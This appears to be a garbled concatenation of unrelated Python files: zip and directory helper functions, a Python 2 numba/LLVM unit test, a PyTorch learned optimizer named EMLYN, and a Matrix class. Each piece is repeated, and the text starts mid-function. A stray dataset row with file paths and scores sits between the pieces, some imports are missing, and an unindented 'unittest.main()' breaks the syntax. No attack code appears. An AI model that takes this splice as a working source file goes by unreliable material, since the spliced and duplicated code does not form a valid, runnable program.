    # Set membership replaces the manual scan loop of the original.
    return file_type in mimes
def unzip(path, file_name) -> None:
    """
    Unzip a ZIP file

    Extracts ``path/file_name`` into ``path``.

    Raises:
        Exception: if the archive file does not exist.

    Returns:
        None: Nothing
    """
    archive = os.path.join(path, file_name)
    if not os.path.isfile(archive):
        raise Exception(
            'A problem occurred while trying to unzip the file archive : file do not exists nor is a valid one.')
    # Context manager guarantees the handle is closed even if extraction fails.
    with zipfile.ZipFile(archive, 'r') as f:
        f.extractall(path)
def check_times(to_update, reference) -> bool:
    """
    Check if there is a difference between update times

    Returns:
        bool: True when *to_update* is at least as fresh as *reference*
    """
    latest = to_update.get_last_update()
    baseline = reference.get_last_update()
    return latest >= baseline
def create_directory(directory_name) -> None:
    """
    Create a directory called "directory_name"

    Creates intermediate directories as needed; a no-op when it exists.

    Returns:
        None: Nothing
    """
    # exist_ok avoids the check-then-create race of the original.
    os.makedirs(directory_name, exist_ok=True)
def create_empty_file(file_name, relative_directory) -> None:
    """
    Creates an empty file in the relative directory "relative_directory"

    An existing file of the same name is truncated (same as the original
    ``open(..., 'w')`` behaviour).

    Returns:
        None: Nothing
    """
    with open(os.path.join(relative_directory, file_name), 'w'):
        pass
# TOOK & ADAPTED FROM THIS POST :
# https://stackoverflow.com/questions/185936/how-to-delete-the-contents-of-a-folder-in-python
def clear_directory(folder) -> None:
    """
    Clear a particular directory of his files

    Removes every regular file except ``.json`` files; errors are printed
    and skipped.

    Returns:
        None: Nothing
    """
    for entry in os.listdir(folder):
        full_path = os.path.join(folder, entry)
        try:
            extension = os.path.splitext(full_path)[1]
            # JSON files are kept on purpose.
            if extension != '.json' and os.path.isfile(full_path):
                os.unlink(full_path)
        except Exception as e:
            print(e)
def launch_exception(message: str) -> None:
    """
    Launch an exception with a message "message"

    Args:
        message: Exception message

    Raises:
        Exception: always, carrying *message*

    Returns:
        None: Nothing
    """
    raise Exception(message)
def parse_host(link: str) -> Optional[str]:
    """
    Parse the host name in a given link

    Args:
        link: Link to a website

    Returns:
        str: the host name, or None when *link* does not match
    """
    # BUG FIX: raw string silences the invalid "\." escape warning, and the
    # original class [a-zA-z] spanned ASCII 'Z'..'a' punctuation -- narrowed
    # to letters and digits only.
    pattern = re.compile(r"^http[s]?://([a-z0-9]*\.[a-z]*)[/]?[a-zA-Z0-9]*?$")
    matches = pattern.match(link)
    if matches:
        return matches.group(1)  # it's the only possible group
    return None
def replace(string: str, args: dict) -> str:
    """
    Replaces the args in brackets by theirs value defined in args

    Args:
        string: string containing all the params
        args: Arguments to replace

    Returns:
        str: the new params string with {var} replaced by var
    """
    for key, value in args.items():
        # BUG FIX: str.replace avoids re.sub's special handling of regex
        # metacharacters in keys and backslashes in replacement values.
        string = string.replace('{' + key + '}', value)
    return string
import re
import zipfile
from typing import Optional
def is_zip(file_type) -> bool:
    """
    Check if the given file is a ZIP

    Args:
        file_type: MIME type string to test

    Returns:
        bool: Whether it's a ZIP file or not
    """
    mimes = {
        'application/zip',
        'application/octet-stream',
        'application/x-zip-compressed',
        'multipart/x-zip'
    }
    # Set membership replaces the manual scan loop of the original.
    return file_type in mimes
def unzip(path, file_name) -> None:
    """
    Unzip a ZIP file

    Extracts ``path/file_name`` into ``path``.

    Raises:
        Exception: if the archive file does not exist.

    Returns:
        None: Nothing
    """
    archive = os.path.join(path, file_name)
    if not os.path.isfile(archive):
        raise Exception(
            'A problem occurred while trying to unzip the file archive : file do not exists nor is a valid one.')
    # Context manager guarantees the handle is closed even if extraction fails.
    with zipfile.ZipFile(archive, 'r') as f:
        f.extractall(path)
def check_times(to_update, reference) -> bool:
    """
    Check if there is a difference between update times

    Returns:
        bool: True when *to_update* is at least as fresh as *reference*
    """
    latest = to_update.get_last_update()
    baseline = reference.get_last_update()
    return latest >= baseline
def create_directory(directory_name) -> None:
    """
    Create a directory called "directory_name"

    Creates intermediate directories as needed; a no-op when it exists.

    Returns:
        None: Nothing
    """
    # exist_ok avoids the check-then-create race of the original.
    os.makedirs(directory_name, exist_ok=True)
def create_empty_file(file_name, relative_directory) -> None:
    """
    Creates an empty file in the relative directory "relative_directory"

    An existing file of the same name is truncated (same as the original
    ``open(..., 'w')`` behaviour).

    Returns:
        None: Nothing
    """
    with open(os.path.join(relative_directory, file_name), 'w'):
        pass
# TOOK & ADAPTED FROM THIS POST :
# https://stackoverflow.com/questions/185936/how-to-delete-the-contents-of-a-folder-in-python
def clear_directory(folder) -> None:
    """
    Clear a particular directory of his files

    Removes every regular file except ``.json`` files; errors are printed
    and skipped.

    Returns:
        None: Nothing
    """
    for entry in os.listdir(folder):
        full_path = os.path.join(folder, entry)
        try:
            extension = os.path.splitext(full_path)[1]
            # JSON files are kept on purpose.
            if extension != '.json' and os.path.isfile(full_path):
                os.unlink(full_path)
        except Exception as e:
            print(e)
def launch_exception(message: str) -> None:
    """
    Launch an exception with a message "message"

    Args:
        message: Exception message

    Raises:
        Exception: always, carrying *message*

    Returns:
        None: Nothing
    """
    raise Exception(message)
def parse_host(link: str) -> Optional[str]:
    """
    Parse the host name in a given link

    Args:
        link: Link to a website

    Returns:
        str: the host name, or None when *link* does not match
    """
    # BUG FIX: raw string silences the invalid "\." escape warning, and the
    # original class [a-zA-z] spanned ASCII 'Z'..'a' punctuation -- narrowed
    # to letters and digits only.
    pattern = re.compile(r"^http[s]?://([a-z0-9]*\.[a-z]*)[/]?[a-zA-Z0-9]*?$")
    matches = pattern.match(link)
    if matches:
        return matches.group(1)  # it's the only possible group
    return None
def replace(string: str, args: dict) -> str:
    """
    Replaces the args in brackets by theirs value defined in args

    Args:
        string: string containing all the params
        args: Arguments to replace

    Returns:
        str: the new params string with {var} replaced by var
    """
    for key, value in args.items():
        # BUG FIX: str.replace avoids re.sub's special handling of regex
        # metacharacters in keys and backslashes in replacement values.
        string = string.replace('{' + key + '}', value)
    return string
# ______________________________________________________________________
import ctypes
import llvm.core as lc
import llvm.ee as le
from numba.llvm_types import _int32, _numpy_array, _head_len
import numba.multiarray_api as ma
import numpy as np
import unittest
# ______________________________________________________________________
_pyobj_to_pyobj = ctypes.CFUNCTYPE(ctypes.py_object, ctypes.py_object)
# ______________________________________________________________________
class TestMultiarrayAPI(unittest.TestCase):
    """Exercises the generated PyArray_API wrappers through the llvmpy JIT.

    NOTE: this module uses a Python 2 ``print`` statement and the legacy
    llvm-py bindings; it will not run under Python 3.
    """
    def test_call_PyArray_Zeros(self):
        """JIT a function calling PyArray_Zeros with its argument's
        dimensions/dtype and check the result is an all-zero array."""
        ma_obj = ma.MultiarrayAPI()
        module = lc.Module.new('test_module')
        ma_obj.set_PyArray_API(module)
        # One function: numpy-array argument in, numpy array out.
        test_fn = module.add_function(lc.Type.function(_numpy_array,
                                                       [_numpy_array]),
                                      'test_fn')
        bb = test_fn.append_basic_block('entry')
        builder = lc.Builder.new(bb)
        pyarray_zeros = ma_obj.load_PyArray_Zeros(module, builder)
        arg = test_fn.args[0]
        # Load struct fields at offsets _head_len + (1, 2, 5) from the
        # array argument -- presumably nd, dimensions and descr; confirm
        # against numba.llvm_types' PyArrayObject layout.
        largs = [
            builder.load(
                builder.gep(arg,
                            [lc.Constant.int(_int32, 0),
                             lc.Constant.int(_int32, _head_len + ofs)]))
            for ofs in (1, 2, 5)]
        # Final argument: fortran flag = 0 (C order).
        largs.append(lc.Constant.int(_int32, 0))
        builder.ret(builder.call(pyarray_zeros, largs))
        if __debug__:
            print module
        # JIT-compile and wrap the native pointer as a Python callable.
        ee = le.ExecutionEngine.new(module)
        test_fn_addr = ee.get_pointer_to_function(test_fn)
        py_test_fn = _pyobj_to_pyobj(test_fn_addr)
        test_arr = np.array([1.,2.,3.])
        result = py_test_fn(test_arr)
        self.assertEqual(result.shape, test_arr.shape)
        self.assertTrue((result == 0.).all())
# ______________________________________________________________________
if __name__ == "__main__":
unittest.main()
# ______________________________________________________________________
# End of test_multiarray_api.py | tests/test_multiarray_api.py | # ______________________________________________________________________
import ctypes
import llvm.core as lc
import llvm.ee as le
from numba.llvm_types import _int32, _numpy_array, _head_len
import numba.multiarray_api as ma
import numpy as np
import unittest
# ______________________________________________________________________
_pyobj_to_pyobj = ctypes.CFUNCTYPE(ctypes.py_object, ctypes.py_object)
# ______________________________________________________________________
class TestMultiarrayAPI(unittest.TestCase):
    """Exercises the generated PyArray_API wrappers through the llvmpy JIT.

    NOTE: this module uses a Python 2 ``print`` statement and the legacy
    llvm-py bindings; it will not run under Python 3.
    """
    def test_call_PyArray_Zeros(self):
        """JIT a function calling PyArray_Zeros with its argument's
        dimensions/dtype and check the result is an all-zero array."""
        ma_obj = ma.MultiarrayAPI()
        module = lc.Module.new('test_module')
        ma_obj.set_PyArray_API(module)
        # One function: numpy-array argument in, numpy array out.
        test_fn = module.add_function(lc.Type.function(_numpy_array,
                                                       [_numpy_array]),
                                      'test_fn')
        bb = test_fn.append_basic_block('entry')
        builder = lc.Builder.new(bb)
        pyarray_zeros = ma_obj.load_PyArray_Zeros(module, builder)
        arg = test_fn.args[0]
        # Load struct fields at offsets _head_len + (1, 2, 5) from the
        # array argument -- presumably nd, dimensions and descr; confirm
        # against numba.llvm_types' PyArrayObject layout.
        largs = [
            builder.load(
                builder.gep(arg,
                            [lc.Constant.int(_int32, 0),
                             lc.Constant.int(_int32, _head_len + ofs)]))
            for ofs in (1, 2, 5)]
        # Final argument: fortran flag = 0 (C order).
        largs.append(lc.Constant.int(_int32, 0))
        builder.ret(builder.call(pyarray_zeros, largs))
        if __debug__:
            print module
        # JIT-compile and wrap the native pointer as a Python callable.
        ee = le.ExecutionEngine.new(module)
        test_fn_addr = ee.get_pointer_to_function(test_fn)
        py_test_fn = _pyobj_to_pyobj(test_fn_addr)
        test_arr = np.array([1.,2.,3.])
        result = py_test_fn(test_arr)
        self.assertEqual(result.shape, test_arr.shape)
        self.assertTrue((result == 0.).all())
# ______________________________________________________________________
if __name__ == "__main__":
unittest.main()
# ______________________________________________________________________
# End of test_multiarray_api.py | 0.179315 | 0.188623 |
import torch
import torch.nn as nn
from torch.optim import Optimizer
class OptimActivation(nn.Module):
    """Learnable mixture of activations.

    Five logits (softmax-normalised) weight swish, sine, identity, sigmoid
    and tanh responses of the input.
    """
    def __init__(self):
        super(OptimActivation, self).__init__()
        # One mixing logit per candidate activation.
        self.params = nn.Parameter(torch.zeros(5))
    def forward(self, x):
        params_softmax = torch.softmax(self.params, dim=-1)
        x_swish = (torch.sigmoid(x) * x) * params_softmax[0]
        x_sine = torch.sin(x) * params_softmax[1]
        x_linear = x * params_softmax[2]
        x_sigmoid = (torch.sigmoid(x) * params_softmax[3])
        x_tanh = (torch.tanh(x)) * params_softmax[4]
        # BUG FIX: the sigmoid and tanh branches were computed but dropped
        # from the sum, leaving mixing weights 3 and 4 dead parameters.
        return x_swish + x_sine + x_linear + x_sigmoid + x_tanh
class OptimAttn(nn.Module):
    """Single-head attention over feature positions followed by a small
    normalised feed-forward stack."""
    def __init__(self, size, out_size):
        super(OptimAttn, self).__init__()
        self.query_linear = nn.Linear(size, size, bias=False)
        self.key_linear = nn.Linear(size, size, bias=False)
        self.value_linear = nn.Linear(size, size, bias=False)
        self.activation = OptimActivation()
        self.fc_linear = nn.Linear(size, size)
        self.norm = nn.LayerNorm((size,))
        self.fc_linear2 = nn.Linear(size, out_size)
        self.norm2 = nn.LayerNorm((out_size,))
    def forward(self, x):
        # Treat each feature as a width-1 token: (batch, size, 1).
        q = self.query_linear(x).unsqueeze(-1)
        k = self.key_linear(x).unsqueeze(-1)
        v = self.value_linear(x).unsqueeze(-1)
        scores = torch.matmul(q, k.transpose(1, 2))
        # Softmax over the whole (size x size) score matrix, not per-row.
        weights = torch.softmax(scores.flatten(start_dim=1), dim=-1).view_as(scores)
        context = torch.matmul(weights, v).squeeze(-1)
        out = self.fc_linear(self.activation(context))
        out = self.norm(out)
        return self.norm2(self.fc_linear2(out))
class OptimNet(torch.nn.Module):
    """Recurrent attention network that proposes parameter updates.

    Owns its own AdamW optimizer so it can be trained online from the
    outer model's loss via ``optimize``.
    """
    def __init__(self, params):
        super(OptimNet, self).__init__()
        # Width taken from the flattened parameter tensor this net serves.
        self.params = params.size()[-1]
        self.linear_h = OptimAttn(self.params*2, self.params*2)
        self.linear_h2 = OptimAttn(self.params*2, self.params*2)
        self.linear_c = OptimAttn(self.params*2, 1)  # scalar loss estimate
        self.linear_a = OptimAttn(self.params*2, self.params)  # per-parameter output
        self.optimizer = torch.optim.AdamW(self.parameters(), lr=1e-3)
        # Recurrent state carried between calls (detached in ``optimize``).
        self.hidden = torch.zeros((1,self.params*2))
    def forward(self, p_grad, is_forget=True):
        z = self.hidden
        h = self.linear_h(p_grad)
        h = self.linear_h2(h + z)  # mix the recurrent state into the features
        c = self.linear_c(h)
        a = self.linear_a(h)
        if is_forget:
            a = torch.sigmoid(a)  # gate outputs squashed to (0, 1)
        return a, c, h
    def optimize(self, loss, p_grad, is_forget=True):
        # One online training step for this optimizer-network.
        self.optimizer.zero_grad()
        p_grad = p_grad.detach()
        a, c, h = self.forward(p_grad, is_forget)
        self.hidden = h.detach()  # truncate backprop-through-time at one step
        # NOTE(review): the bare c term plus smooth-L1 fit of c to the
        # observed loss -- confirm the intended objective.
        loss_new = (c) + torch.nn.functional.smooth_l1_loss(c, loss)
        loss_new.backward(retain_graph=True)
        loss_new = loss_new + loss  # result unused afterwards; kept as-is
        self.optimizer.step()
class EMLYN(Optimizer):
    """Optimizer whose update rule is produced by learned OptimNet modules."""
    def __init__(self, params, lr=1e-2, betas=0.99):
        defaults = dict(lr=lr, betas=betas)
        super(EMLYN, self).__init__(params, defaults)
    def step(self, loss):
        # Unlike standard torch optimizers, step() needs the current loss
        # so the internal networks can be trained online.
        for group in self.param_groups:
            for p in group['params']:
                grad_original_shape = p.grad.data.shape
                grad = p.grad.data.flatten().unsqueeze(0)
                parameters = p.data.flatten().unsqueeze(0)
                p_g = torch.cat([grad, parameters], dim=-1)  # net input: [grad | params]
                state = self.state[p]
                if len(state) == 0:
                    # Lazily build one trio of networks per parameter tensor.
                    state['forgnet'] = OptimNet(params=parameters)
                    state['net'] = OptimNet(params=parameters)
                    state['neta'] = OptimNet(params=parameters)
                    state['momentum_buffer'] = torch.zeros_like(parameters)
                net = state['net']
                forgnet = state['forgnet']
                neta = state['neta']
                momentum_buffer = state['momentum_buffer']
                with torch.enable_grad():
                    # net: additive gradient correction; forgnet: forget
                    # gate; neta: momentum-mixing coefficient.
                    new_grad = net(p_g, False)[0]
                    new_forget = forgnet(p_g)[0]
                    new_neta = neta(p_g)[0]
                    net.optimize(loss, p_g)
                    forgnet.optimize(loss, p_g)
                    neta.optimize(loss, p_g)
                grad = new_grad + grad
                # EMA-style momentum with a learned per-step coefficient.
                momentum_buffer = new_neta * momentum_buffer + (1-new_neta) * grad
                grad = momentum_buffer
                grad *= new_forget
                grad *= group['lr']
                grad = grad.view(grad_original_shape)
                p.data = p.data - grad
import torch.nn as nn
from torch.optim import Optimizer
class OptimActivation(nn.Module):
    """Learnable mixture of activations.

    Five logits (softmax-normalised) weight swish, sine, identity, sigmoid
    and tanh responses of the input.
    """
    def __init__(self):
        super(OptimActivation, self).__init__()
        # One mixing logit per candidate activation.
        self.params = nn.Parameter(torch.zeros(5))
    def forward(self, x):
        params_softmax = torch.softmax(self.params, dim=-1)
        x_swish = (torch.sigmoid(x) * x) * params_softmax[0]
        x_sine = torch.sin(x) * params_softmax[1]
        x_linear = x * params_softmax[2]
        x_sigmoid = (torch.sigmoid(x) * params_softmax[3])
        x_tanh = (torch.tanh(x)) * params_softmax[4]
        # BUG FIX: the sigmoid and tanh branches were computed but dropped
        # from the sum, leaving mixing weights 3 and 4 dead parameters.
        return x_swish + x_sine + x_linear + x_sigmoid + x_tanh
class OptimAttn(nn.Module):
    """Single-head attention over feature positions followed by a small
    normalised feed-forward stack."""
    def __init__(self, size, out_size):
        super(OptimAttn, self).__init__()
        self.query_linear = nn.Linear(size, size, bias=False)
        self.key_linear = nn.Linear(size, size, bias=False)
        self.value_linear = nn.Linear(size, size, bias=False)
        self.activation = OptimActivation()
        self.fc_linear = nn.Linear(size, size)
        self.norm = nn.LayerNorm((size,))
        self.fc_linear2 = nn.Linear(size, out_size)
        self.norm2 = nn.LayerNorm((out_size,))
    def forward(self, x):
        # Treat each feature as a width-1 token: (batch, size, 1).
        q = self.query_linear(x).unsqueeze(-1)
        k = self.key_linear(x).unsqueeze(-1)
        v = self.value_linear(x).unsqueeze(-1)
        scores = torch.matmul(q, k.transpose(1, 2))
        # Softmax over the whole (size x size) score matrix, not per-row.
        weights = torch.softmax(scores.flatten(start_dim=1), dim=-1).view_as(scores)
        context = torch.matmul(weights, v).squeeze(-1)
        out = self.fc_linear(self.activation(context))
        out = self.norm(out)
        return self.norm2(self.fc_linear2(out))
class OptimNet(torch.nn.Module):
    """Recurrent attention network that proposes parameter updates.

    Owns its own AdamW optimizer so it can be trained online from the
    outer model's loss via ``optimize``.
    """
    def __init__(self, params):
        super(OptimNet, self).__init__()
        # Width taken from the flattened parameter tensor this net serves.
        self.params = params.size()[-1]
        self.linear_h = OptimAttn(self.params*2, self.params*2)
        self.linear_h2 = OptimAttn(self.params*2, self.params*2)
        self.linear_c = OptimAttn(self.params*2, 1)  # scalar loss estimate
        self.linear_a = OptimAttn(self.params*2, self.params)  # per-parameter output
        self.optimizer = torch.optim.AdamW(self.parameters(), lr=1e-3)
        # Recurrent state carried between calls (detached in ``optimize``).
        self.hidden = torch.zeros((1,self.params*2))
    def forward(self, p_grad, is_forget=True):
        z = self.hidden
        h = self.linear_h(p_grad)
        h = self.linear_h2(h + z)  # mix the recurrent state into the features
        c = self.linear_c(h)
        a = self.linear_a(h)
        if is_forget:
            a = torch.sigmoid(a)  # gate outputs squashed to (0, 1)
        return a, c, h
    def optimize(self, loss, p_grad, is_forget=True):
        # One online training step for this optimizer-network.
        self.optimizer.zero_grad()
        p_grad = p_grad.detach()
        a, c, h = self.forward(p_grad, is_forget)
        self.hidden = h.detach()  # truncate backprop-through-time at one step
        # NOTE(review): the bare c term plus smooth-L1 fit of c to the
        # observed loss -- confirm the intended objective.
        loss_new = (c) + torch.nn.functional.smooth_l1_loss(c, loss)
        loss_new.backward(retain_graph=True)
        loss_new = loss_new + loss  # result unused afterwards; kept as-is
        self.optimizer.step()
class EMLYN(Optimizer):
    """Optimizer whose update rule is produced by learned OptimNet modules."""
    def __init__(self, params, lr=1e-2, betas=0.99):
        defaults = dict(lr=lr, betas=betas)
        super(EMLYN, self).__init__(params, defaults)
    def step(self, loss):
        # Unlike standard torch optimizers, step() needs the current loss
        # so the internal networks can be trained online.
        for group in self.param_groups:
            for p in group['params']:
                grad_original_shape = p.grad.data.shape
                grad = p.grad.data.flatten().unsqueeze(0)
                parameters = p.data.flatten().unsqueeze(0)
                p_g = torch.cat([grad, parameters], dim=-1)  # net input: [grad | params]
                state = self.state[p]
                if len(state) == 0:
                    # Lazily build one trio of networks per parameter tensor.
                    state['forgnet'] = OptimNet(params=parameters)
                    state['net'] = OptimNet(params=parameters)
                    state['neta'] = OptimNet(params=parameters)
                    state['momentum_buffer'] = torch.zeros_like(parameters)
                net = state['net']
                forgnet = state['forgnet']
                neta = state['neta']
                momentum_buffer = state['momentum_buffer']
                with torch.enable_grad():
                    # net: additive gradient correction; forgnet: forget
                    # gate; neta: momentum-mixing coefficient.
                    new_grad = net(p_g, False)[0]
                    new_forget = forgnet(p_g)[0]
                    new_neta = neta(p_g)[0]
                    net.optimize(loss, p_g)
                    forgnet.optimize(loss, p_g)
                    neta.optimize(loss, p_g)
                grad = new_grad + grad
                # EMA-style momentum with a learned per-step coefficient.
                momentum_buffer = new_neta * momentum_buffer + (1-new_neta) * grad
                grad = momentum_buffer
                grad *= new_forget
                grad *= group['lr']
                grad = grad.view(grad_original_shape)
                p.data = p.data - grad
from typing import List, Tuple, Union
from .exceptions import NotSquareException, ValidationError
Number = Union[int, float]
class Matrix:
    """A dense matrix stored as a list of row lists.

    Supports element-wise addition and subtraction, scalar and matrix
    multiplication, rounding, transposition, and a family of predicates
    (square, diagonal, symmetric, identity, ...).

    Raises:
        ValidationError: on construction, if rows have unequal lengths.
    """

    def __init__(self, rows: List[List[Number]]) -> None:
        """Store *rows* and validate that every row has the same length."""
        self.rows = rows
        self._validate()

    def __str__(self) -> str:
        return str(self.rows)

    def __round__(self, ndigits: Union[int, None] = None) -> "Matrix":
        """Return a new matrix with every entry rounded to *ndigits* digits."""
        temp = self._get_zero_matrix()
        for i in range(self.num_rows):
            for j in range(self.num_cols):
                temp[i][j] = round(self.rows[i][j], ndigits)
        return Matrix(temp)

    def __add__(self, other: "Matrix") -> "Matrix":
        """Element-wise sum; assumes *other* has the same dimensions."""
        temp = self._get_zero_matrix()
        for i in range(self.num_rows):
            for j in range(self.num_cols):
                temp[i][j] = self.rows[i][j] + other.rows[i][j]
        return Matrix(temp)

    def __sub__(self, other: "Matrix") -> "Matrix":
        """Element-wise difference; assumes *other* has the same dimensions."""
        temp = self._get_zero_matrix()
        for i in range(self.num_rows):
            for j in range(self.num_cols):
                temp[i][j] = self.rows[i][j] - other.rows[i][j]
        return Matrix(temp)

    def __mul__(self, other: Union["Matrix", Number]) -> "Matrix":
        """Scalar multiplication for numbers, matrix product for matrices."""
        if isinstance(other, (int, float)):
            temp = self._get_zero_matrix()
            for i in range(self.num_rows):
                for j in range(self.num_cols):
                    temp[i][j] = self.rows[i][j] * other
            return Matrix(temp)
        # Matrix product: (m x n) @ (n x p) -> (m x p).
        temp = self._get_zero_matrix_with_size(self.num_rows, other.num_cols)
        for i in range(self.num_rows):
            for j in range(other.num_cols):
                for k in range(self.num_cols):
                    temp[i][j] += self.rows[i][k] * other.rows[k][j]
        return Matrix(temp)

    def __eq__(self, other: object) -> bool:
        # Fix: previously raised AttributeError when compared with a
        # non-Matrix; returning NotImplemented lets Python fall back to the
        # other operand (and ultimately to inequality).
        if not isinstance(other, Matrix):
            return NotImplemented
        return self.rows == other.rows

    def __neg__(self) -> "Matrix":
        return self * -1

    def _validate(self) -> None:
        """Set num_rows/num_cols; raise ValidationError on ragged rows."""
        self.num_rows = len(self.rows)
        num_cols = len(self.rows[0])
        if all(len(row) == num_cols for row in self.rows):
            self.num_cols = num_cols
        else:
            raise ValidationError("All rows must have equal number of columns")

    def _get_zero_matrix_with_size(self, rows: int, cols: int) -> List[List[Number]]:
        return [[0 for _ in range(cols)] for _ in range(rows)]

    def _get_zero_matrix(self) -> List[List[Number]]:
        return self._get_zero_matrix_with_size(self.num_rows, self.num_cols)

    def _get_diagonal_and_non_diagonal_entries(
        self,
    ) -> Tuple[List[Number], List[Number]]:
        """Split entries into (diagonal, off-diagonal); square matrices only."""
        if not self.is_square_matrix():
            raise NotSquareException(
                "Cannot check for diagonal matrix because it is not a square matrix"
            )
        # Plain loops instead of a side-effect list comprehension.
        diagonal: List[Number] = []
        non_diagonal: List[Number] = []
        for i in range(self.num_rows):
            for j in range(self.num_cols):
                if i == j:
                    diagonal.append(self.rows[i][j])
                else:
                    non_diagonal.append(self.rows[i][j])
        return diagonal, non_diagonal

    def prettify(self) -> None:
        """Print the matrix one row per line."""
        print("\n".join(str(row) for row in self.rows))

    def transpose(self) -> "Matrix":
        """Return a new matrix with rows and columns swapped."""
        temp = self._get_zero_matrix_with_size(self.num_cols, self.num_rows)
        for i in range(self.num_rows):
            for j in range(self.num_cols):
                temp[j][i] = self.rows[i][j]
        return Matrix(temp)

    def is_row_matrix(self) -> bool:
        return self.num_rows == 1

    def is_column_matrix(self) -> bool:
        return self.num_cols == 1

    def is_rectangular_matrix(self) -> bool:
        return self.num_rows != self.num_cols

    def is_square_matrix(self) -> bool:
        return self.num_rows == self.num_cols

    def is_zero_matrix(self) -> bool:
        return self._get_zero_matrix() == self.rows

    def is_symmetric_matrix(self) -> bool:
        return self == self.transpose()

    def is_skew_symmetric_matrix(self) -> bool:
        return -self == self.transpose()

    def is_diagonal_matrix(self) -> bool:
        # NOTE: requires at least one non-zero diagonal entry, so the zero
        # matrix is deliberately not considered diagonal here.
        diagonal, non_diagonal = self._get_diagonal_and_non_diagonal_entries()
        return all(element == 0 for element in non_diagonal) and any(diagonal)

    def is_scalar_matrix(self) -> bool:
        diagonal, non_diagonal = self._get_diagonal_and_non_diagonal_entries()
        return all(element == 0 for element in non_diagonal) and all(
            element != 0 and element == diagonal[0] for element in diagonal
        )

    def is_identity_matrix(self) -> bool:
        diagonal, non_diagonal = self._get_diagonal_and_non_diagonal_entries()
        return all(element == 0 for element in non_diagonal) and all(
            element == 1 for element in diagonal
        )
from .exceptions import NotSquareException, ValidationError
Number = Union[int, float]
class Matrix:
    """A dense matrix stored as a list of row lists.

    Supports element-wise addition and subtraction, scalar and matrix
    multiplication, rounding, transposition, and a family of predicates
    (square, diagonal, symmetric, identity, ...).

    Raises:
        ValidationError: on construction, if rows have unequal lengths.
    """

    def __init__(self, rows: List[List[Number]]) -> None:
        """Store *rows* and validate that every row has the same length."""
        self.rows = rows
        self._validate()

    def __str__(self) -> str:
        return str(self.rows)

    def __round__(self, ndigits: Union[int, None] = None) -> "Matrix":
        """Return a new matrix with every entry rounded to *ndigits* digits."""
        temp = self._get_zero_matrix()
        for i in range(self.num_rows):
            for j in range(self.num_cols):
                temp[i][j] = round(self.rows[i][j], ndigits)
        return Matrix(temp)

    def __add__(self, other: "Matrix") -> "Matrix":
        """Element-wise sum; assumes *other* has the same dimensions."""
        temp = self._get_zero_matrix()
        for i in range(self.num_rows):
            for j in range(self.num_cols):
                temp[i][j] = self.rows[i][j] + other.rows[i][j]
        return Matrix(temp)

    def __sub__(self, other: "Matrix") -> "Matrix":
        """Element-wise difference; assumes *other* has the same dimensions."""
        temp = self._get_zero_matrix()
        for i in range(self.num_rows):
            for j in range(self.num_cols):
                temp[i][j] = self.rows[i][j] - other.rows[i][j]
        return Matrix(temp)

    def __mul__(self, other: Union["Matrix", Number]) -> "Matrix":
        """Scalar multiplication for numbers, matrix product for matrices."""
        if isinstance(other, (int, float)):
            temp = self._get_zero_matrix()
            for i in range(self.num_rows):
                for j in range(self.num_cols):
                    temp[i][j] = self.rows[i][j] * other
            return Matrix(temp)
        # Matrix product: (m x n) @ (n x p) -> (m x p).
        temp = self._get_zero_matrix_with_size(self.num_rows, other.num_cols)
        for i in range(self.num_rows):
            for j in range(other.num_cols):
                for k in range(self.num_cols):
                    temp[i][j] += self.rows[i][k] * other.rows[k][j]
        return Matrix(temp)

    def __eq__(self, other: object) -> bool:
        # Fix: previously raised AttributeError when compared with a
        # non-Matrix; returning NotImplemented lets Python fall back to the
        # other operand (and ultimately to inequality).
        if not isinstance(other, Matrix):
            return NotImplemented
        return self.rows == other.rows

    def __neg__(self) -> "Matrix":
        return self * -1

    def _validate(self) -> None:
        """Set num_rows/num_cols; raise ValidationError on ragged rows."""
        self.num_rows = len(self.rows)
        num_cols = len(self.rows[0])
        if all(len(row) == num_cols for row in self.rows):
            self.num_cols = num_cols
        else:
            raise ValidationError("All rows must have equal number of columns")

    def _get_zero_matrix_with_size(self, rows: int, cols: int) -> List[List[Number]]:
        return [[0 for _ in range(cols)] for _ in range(rows)]

    def _get_zero_matrix(self) -> List[List[Number]]:
        return self._get_zero_matrix_with_size(self.num_rows, self.num_cols)

    def _get_diagonal_and_non_diagonal_entries(
        self,
    ) -> Tuple[List[Number], List[Number]]:
        """Split entries into (diagonal, off-diagonal); square matrices only."""
        if not self.is_square_matrix():
            raise NotSquareException(
                "Cannot check for diagonal matrix because it is not a square matrix"
            )
        # Plain loops instead of a side-effect list comprehension.
        diagonal: List[Number] = []
        non_diagonal: List[Number] = []
        for i in range(self.num_rows):
            for j in range(self.num_cols):
                if i == j:
                    diagonal.append(self.rows[i][j])
                else:
                    non_diagonal.append(self.rows[i][j])
        return diagonal, non_diagonal

    def prettify(self) -> None:
        """Print the matrix one row per line."""
        print("\n".join(str(row) for row in self.rows))

    def transpose(self) -> "Matrix":
        """Return a new matrix with rows and columns swapped."""
        temp = self._get_zero_matrix_with_size(self.num_cols, self.num_rows)
        for i in range(self.num_rows):
            for j in range(self.num_cols):
                temp[j][i] = self.rows[i][j]
        return Matrix(temp)

    def is_row_matrix(self) -> bool:
        return self.num_rows == 1

    def is_column_matrix(self) -> bool:
        return self.num_cols == 1

    def is_rectangular_matrix(self) -> bool:
        return self.num_rows != self.num_cols

    def is_square_matrix(self) -> bool:
        return self.num_rows == self.num_cols

    def is_zero_matrix(self) -> bool:
        return self._get_zero_matrix() == self.rows

    def is_symmetric_matrix(self) -> bool:
        return self == self.transpose()

    def is_skew_symmetric_matrix(self) -> bool:
        return -self == self.transpose()

    def is_diagonal_matrix(self) -> bool:
        # NOTE: requires at least one non-zero diagonal entry, so the zero
        # matrix is deliberately not considered diagonal here.
        diagonal, non_diagonal = self._get_diagonal_and_non_diagonal_entries()
        return all(element == 0 for element in non_diagonal) and any(diagonal)

    def is_scalar_matrix(self) -> bool:
        diagonal, non_diagonal = self._get_diagonal_and_non_diagonal_entries()
        return all(element == 0 for element in non_diagonal) and all(
            element != 0 and element == diagonal[0] for element in diagonal
        )

    def is_identity_matrix(self) -> bool:
        diagonal, non_diagonal = self._get_diagonal_and_non_diagonal_entries()
        return all(element == 0 for element in non_diagonal) and all(
            element == 1 for element in diagonal
        )